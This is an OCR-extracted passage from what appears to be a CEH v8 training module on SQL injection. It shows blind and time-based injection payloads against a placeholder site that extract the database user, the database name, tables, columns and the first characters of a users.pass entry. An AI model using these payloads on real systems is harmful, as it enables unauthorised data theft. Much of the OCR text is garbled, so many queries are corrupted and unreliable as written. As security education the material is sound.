two SQL queries to get more data. The attacker tries to exploit the Union operator to easily get
more information from the databaase management system. Blind injections help an attacker
to bypass more filters easily. One of the main differences in blind SQL injection is entries are
read symbol by symbol.
Searching for the first character of the first table entry
/ ?id=l+AND+555=if(ord(m id( (select+ pass+ from
97.555.777)

u s e rs+ lim it+ 0 ,1 ) ,1 , 1 )) =

If the table "users" contains a column "pass" and the first character of the first entry in this
column is 97 (letter "a"), then DBMS can return TRUE; otherwise, FALSE.
Searching for the second character of the first table entry
/ ?id=l+AND+555=if(ord(m id( (sele ct+ p a ss
97.555.777)

from +users+lim it+O,1 ) ,2 , 1 )) =

If the table "users" contains a column "pass" and the second character of the first entry in this
column is 97 (letter «a»), then DBMS can return TRUE; otherwise, FALSE.

Module 14 Page 2047


SQL Injection


Blind SQL Injection - Extract
D atabase User

CEH

Finding a full user name of 8 characters using binary search method takes 56 requests

Check for username length
h t t p : / / j u g g y b o y . c o m / p a g e .a s p x ? id = l; I F

(L E N (U S E R )=1) WAITFOR DELAY '0 0 : 0 0 :1 0 ‫י‬

h t t p :/ / ju g g y b o y . c o m / p a g e .a s p x ? id = l; I F

(L E N (U S E R )= 2 ) WAITFOR DELAY '0 0 :0 0 :1 0 •

h t t p :/ / ju g g y b o y . c o m / p a g e .a s p x ? id = l; I F

(L E N (U S E R )=3) WAITFOR DELAY '0 0 : 0 0 :1 0 '

17 ‫נ‬

Check if 1st character in username contains 'A' (a=97), 'B', or ,C etc.
h t tp :/ / ju g g y b o y .c o m / p a g e .a s p x ?id = l; I F

( A S C I I(lo w e r (s u b s t r in g ((U S E R ),1 ,1 )))= 9 7 )

WAITFOR DELAY '0 0 :0 0 :1 0 '

h t tp :/ / ju g g y b o y .c o m / p a g e .a s p x ?id = l; I F



h ttp :/ / ju g g y b o y .c o m / p a g e .a s p x ?id = l; I F



Check if 2n character in username contains ‫׳‬A' (a=97), 'B', or *C etc.
d
h ttp :/ / ju g g y b o y .c o m / p a g e .a s p x ?id - l;

I F ( A S C I I(lo w e r (s u b s t r in g ((U S E R ), 2 , 1 ) ) ) - 9 7 )


h ttp :/ / ju g g y b o y .c o m / p a g e .a s p x 7 id - l;

I F ( A S C I I(lo w e r (s u b s t r in g ((U S E R ), 2 , 1 ) ) ) - 9 8 )


h ttp :/ / ju g g y b o y .c o m / p a g e .a s p x 9 id - l;

I F ( A S C I I (lo w e r (s u b s t r in g ((U S E R ), 2 , 1 ) ) ) - 9 9 )


Check if 3rd character in username contains 'A' (a=97), 'B 1 or 'C etc.
,










Blind SQL Injection ‫ ־‬Extract Database User
In the blind SQL injection method, the attacker can extract the database user name.
The attacker can probe yes/no questions from the database server to extract information from
it. To find the first letter of a user name with a binary search, it takes 7 requests and for 8 char
long name it takes 56 requests.

Module 14 Page 2048


SQL Injection


Finding a full username of 8 characters using binary search method takes 56 requests
Check for username length
http://juggyboy.com/page.aspx?id=l;

IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'—





Check if 1st character in usernam e contains ,a 1(a=97), !b or ,c1etc.
http://juggyboy.con/page.aspx?id=l;

IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'





Check if 2n character in username contains 1 (3=97), ,b', or ,c1 etc.
d
a1
http://juggyboy.con/page.aspx?id=l; IF (ASCII(lower(substring((USER),2,1)))=97)

WAITFOR DELAY '00:00:10 ‫־‬

http://juggyboy.con/page.aspx?id=l; IF (ASCII(lower(substring((USER),2,1)))-98)

WAITFOR DELAY ’00:00:10'

http://juggyboy.con/page.aspx?id=l; IF (ASCII(lower(substring((USER),2,1)))=99)

WAITFOR DELAY '00:00:10'

Check if 3rd character in usernam e contains ,a 1(a=97), ,b', or ,c1etc.

IF (ASCII(lower(substring((USER),3,1)))=97)

WAITFOR DELAY 00:00:10‫'־‬







FIGURE 14.15: Extract Database User

Module 14 Page 2049


SQL Injection


D atabase N am e

CEH

C h eck fo r D a ta b a s e N a m e Length and N a m e

I F (LEN(DB_NAME())=4) WAITFOR DELAY 00: 00: 10‫— '־‬

h t t p ://juggyboy.com/page.aspx?id= l;

I F (A SC II(lo w e r(s u b strin g ( (DB_NAME()),1 ,1 )))= 9 7 )


I F (ASCII(lower(substring((DB_NAM E()),2 ,1 )))= 9 8 )

WAITFOR DELAY '00:00:10‫י‬


I F (ASCII(lower(substring((DB_NAM E()),3 ,1 )))= 9 9 )



I F (A SC II(lo w e r(s u b strin g ( (DB_NAME( ) ) , 4 , 1 ) ) ) =100)



Database Name = ABCD

http://juggyboy.
com/page.
aspx?id-l;
WAITFOR DELAY ' 0 0 : 0 0 : 1 0 ' —
http://juggyboy.com/page.aspx7id-l;
xtype-char(85)),1,1)))-101) WAITFOR
xtype-char(85)), 2 , 1 ) ))-109) WAITFOR
xtype-char(85)),3,1)))=112) WAITFOR

IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype-1 ')3‫)״‬
U
IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where
DELAY '00:00:10'-IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where
DELAY ' 0 0 : 0 0 : 1 0 '- IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where
DELAY '00:00:10'—

Table Name = EM P


^

Blind SQL Injection ‫ ־‬Extract Database Nam e
In the blind SQL injection method, the attacker can extract the aatabase name using the

time-based blind SQL injection method. Here, the attacker can brute force the database name
by using time before the execution of the query and set the time after query execution; then he
or she can assess from the result that if the time lapse is 10 seconds, then the name can be 'A‫;׳‬
otherwise, if it took 2 seconds, then it can't be 'A'.

Module 14 Page 2050


SQL Injection


Check for Database Name Length and Name
h t t p : //juggyboy . com/page . aspx?id=l ;

I F (LEN (DB_NAME () )=4) WAITFOR DELAY '00:00:10' —

h t t p : //juggyboy.com/page. asp x?id= l;

I F (A S C II(lo w e r(s u b s trin g ( (DB_NAME( ) ) , 1 , 1 ) ) )=97)

h t t p :// juggyboy. cocn/page. asp x ?id= l;

I F (A SCII (lower (su bstring ( (DBNAME ( ) ) ,2 , 1 ) ) ) =98)

WAITFOR DELAY '00:00:10‫— ״‬

h t t p : //juggyboy.com/page.asp x?id= l;

I F (A S C II(lo w e r(s u b s trin g ( (DB_NAME( ) ) , 3 , 1 ) ) ) =99)

WAITFOR DELAY '0 0 :0 0 :1 0 '—

http://juggyboy.com /page.aspx?id=l;

I F (A S C II(lo w e r(s u b s trin g ( (DBNAME( ) ) , 4 , 1 ) ) ) =100)

WAITFOR DELAY '0 0 :0 0 :1 0 '—

WAITFOR DELAY '0 0 :0 0 :1 0 '—

Database Name = ABCD

Extract 1st Database Table
aspx?id=l;
WAITFOR DELAY '00:00:10'—
http://juggyboy.
com/page.
aspx?id=l;
xtype=char (85)) ,1,1)) )=101) WAITFOR
aspx?id=l;
xtype=char(85)),2,1)))=109) WAITFOR
http://juggyboy.
com/page.
aspx?id=l;
xtype=ahar(85)),3,1)))=11?) WAITFOR

IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype=' ' =3)
U )
IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjeats where
DELAY '00:00:10' —
DELAY '00:00:10' —
DELAY '00:00:10‫י‬
—

Table Name = EMP
F IG U R E 14.16: Extract D atabase N am e

Module 14 Page 2051


SQL Injection


Colum n N am e

C EH

E x tra ct 1st T ab le C o lu m n N a m e
h t t p :/ / juggyboy.com/page.asp x ?id = l; I F (LEN(SELECT TOP 1 column name from ABCD. info rm atio n schema. columns
where table_name= ‫י‬EMP')=3) WAITFOR DELAY '00:00:10' —
h t t p :/ / juggyboy.com/page.asp x ?id = l; I F (A S C II(lo w e r(s u b s trin g ( (SELECT TOP 1 column_name from
ABCD. inform ation_schem a. columns where table_name=' EMP' ) , 1 , 1 ) ) ) =101) WAITFOR DELAY '0 0 :0 0 :1 0 '—
h t t p :/ / juggyboy.com/page.asp x ?id = l; I F (A S C II(lo w e r(s u b s trin g ( (SELECT TOP 1 column_name from
ABCD.inform ation_schem a.columns where table_name='EMP' ) , 2 , 1 ) ) ) =105) WAITFOR DELAY '0 0 :0 0 :1 0 '—
h t t p :/ / juggyboy.com/page.asp x ?id = l/ I F (A S C II(lo w e r(s u b s trin g ( (SELECT TOP 1 column_name from
ABCD.inform ation_schem a.columns where table_name=*EMP' ) , 3 , 1 ) ) ) =100) WAITFOR DELAY '00:00:10'--

Column Name = EID

—

m

i 1 1 1 1 1 1 1 1 1 1 1 1 1111

E x tra ct 2nd Table C o lu m n N a m e
http ://juggyboy. com/page, aspx? id-1; IF (LEN (SELECT TOP 1 column_name from ABCD. in f ormation_schema. columns where
table_name-' EMP' and column_name>' EID 4- (‫ ) י‬WAITFOR DELAY '00:00:10•—
http://juggyboy.com/page.aspx7id-l; IF (A SC II(low er(substring( (SELECT TOP 1 column_name from
ABCD.information_schema.columns where table_name-' EMP' and column_name>' EID ' ) , 1 , 1 ) ) )-100) WAITFOR DELAY '00:00:10'http://juggyboy.com/page.aspx7id-l; IF (A SC II(low er(substring( (SELECT TOP 1 column_name from
ABCD.information_schema.columns where table_name=' EMP' and column_name>' EID ' ) , 2 , 1 ) ) ) -101) WAITFOR DELAY '00:00:10'http://juggyboy.com/page.aspx?id=l; IF (A SC II(low er(substring( (SELECT TOP 1 column_name from
ABCD.information_schema.columns where table_name=' EMP' and column_name>' EID ' ) , 3 , 1 ) ) )=112) WAITFOR DELAY '00:00:10'http://juggyboy.com/page.aspx?id=l; IF (A SC II(low er(substring( (SELECT TOP 1 column_name from
ABCD.information_schema.columns where table_name=' EMP' and column_name>' EID ' ) , 4 , 1 ) ) ) =116) WAITFOR DELAY '00:00:10'-

Column Name = DEPT


Blind SQL Injection ‫ ־‬Extract Column Nam e
In the blind SQL injection method, the attacker can extract the column names using
different brute force methods or tools using which he or she can check for the first table
column name and the second table column name.
Extract 1st Table Column Name
h t tp :/ / ju g g y b o y .coct/page . aspx‫ ־‬id - l
*
I F (LEN(SELECT TOP 1 co lu s ‫־‬r . _ r . f r o n
whore t a b le name- ‫ י‬EM I'‫ - ) י‬J ) MA1TFOR DELAY ■00:00:10

ABCD. in fo r m a tio n _ 9 c h e n a . colu m n s

h t tp :/ / ju g g y b o y . co«/p»g• 1 1 p x ?1 d s l: 1r (A S C II (lo v e r ( s u b s t r in g ( (SELECT TOP 1 e o lim n name from
ABCD. in forma t io : _schw»n‫ ״‬c o lu m n s where ta b le _ n a !r « « ' E M P ') , 1 , 1 ) ) )■101) WAIYFOR DELAY '00 0 0 :1 0 ' —
*

1

h ttp :/ / ju g g y b o y .c o n / p a g e .asp x ?id - 1 . I F (A S C II(lo w e r (s u b s tr in g ((S E L E C T TOP 1 colunn_nane from
ABCD. inform ataon_scheraa. columns where ta b le_r.am e -'E M P') ,2 ,1 )) )-105) WAITFOR DELAY ‫- י 01 :00 :00 י‬h ttp :/ / ju g g y b o y .c o re / p a g e .a s p x ? ld = l; I F (A S C II(lo w e r (s u b s tr in g ((S E L E C T TOP 1 column nano from
A B C D .in fo rm atio n _B c h an a.columns where table_ram e= ' EM P ') , 3 , 1 ) ) )■100) WA1TFOR DELAY '0 0 :0 0 :1 0 '- -

Column Name =EID

Extract 2nd Table Column Name
h te p ://j u g g y b o y .c a a /p a g e .& £ p x ? 3 .d = l; I F (1-EN | SELECT TCS 1 c o l a n r . i x e f r c n ABCD. i n f o r a a t i s r . s c h a i u . colum ns x k e re
t a b l e _ ‫ ״‬a n e - ‫־‬EMP’ a n d c o lu n n _ n a n s> EID 4- ( ‫ ־‬KATTrOP DELAY '0 0 : 0 0 7 1 0 '- )
h t t p : / / j u g g y b o y • 0 c « /p « g * .a « p x '>1.*Bl r I F (ASCI I ( lo w e r ( s u b s t r i n g ( (SKLECT TOP 1 eolumn_nacr* from
ABCD. i n f o r a a tio n _ 3 c h c a a . c o l us® ‫ ב‬w h ere ta b lc _ n m r^ ■ ‫ ־‬EH? ‫ * ־‬a d c o 1 w _ 3 c o k > ' E IS ' ) , 1 ,1 ) ) ) ■100) WAITTOR
h t t p : / / J u g g y b o y .c c a / p a g e . a s p x ‫ ־‬d E i ; i f (ASCII (lo w e r ( s u b s t r i n g ( (SELECT TOP l colux» _n<*r« f r o n
>l
A B C D .in fo z tta tio n s c h s a a .c o lu a m • w h ere t a b l e m m - ' EMP‫ ־‬a nd ‫־. . •»* .« ־‬
>a*e> EID 101- ( ( (2 , 1 , (‫ )־‬WAITFOR
h t t p : / / j u g g y b o y . c o n / p a g e . a s p x * i d - l ; 2F ( A S C I I ( lo w e r ( s u b s tr in g ( (SELECT TOP 1 c o lu n ! >«x« from
ABC□, i n f o n r j t i o n e rh o n a e o l u m i w h ere t a b l e nw e=E N S >' and ‫ . ־ ־‬i n r n a a e V E I ' ) , 3 , 1 )7 ) =i 12) WAITFOR
h t t p ! / / j u g g y b o y . a a n /p a g e . a s p x ? d = l .* I F (ASCII (lo w e r ( s u b s tr .rv g ( (SELECT TOP 1 colum n nacce f r o n
ABCD. in f o r m a tl o n _ s c h e a a . c o lu n n s w here ta b le _ n a & e > ‫־‬EMP' a nd colu*r_r»a»e>• EID ) ,4 , 1) ) )■116) WAITFOR

1

1

1

DELAY '0 0 : 0 0 : 1 0 '- DELAY

0 0 : 0 0 : 1 0 '- -

DELAY

0 0 :0 0 :1 0 • - -

DELAY

0 0 : 0 0 : 1 0 '- -

Column Name = DEPT

FIGURE 14.17: Extract Database User

Module 14 Page 2052


Ce hv8 module 14 sql injection

Ce hv8 module 14 sql injection

Recomendados

Recomendados

Mais conteúdo relacionado

Mais procurados

Mais procurados (20)

Semelhante a Ce hv8 module 14 sql injection

Semelhante a Ce hv8 module 14 sql injection (20)

Último

Último (20)

Ce hv8 module 14 sql injection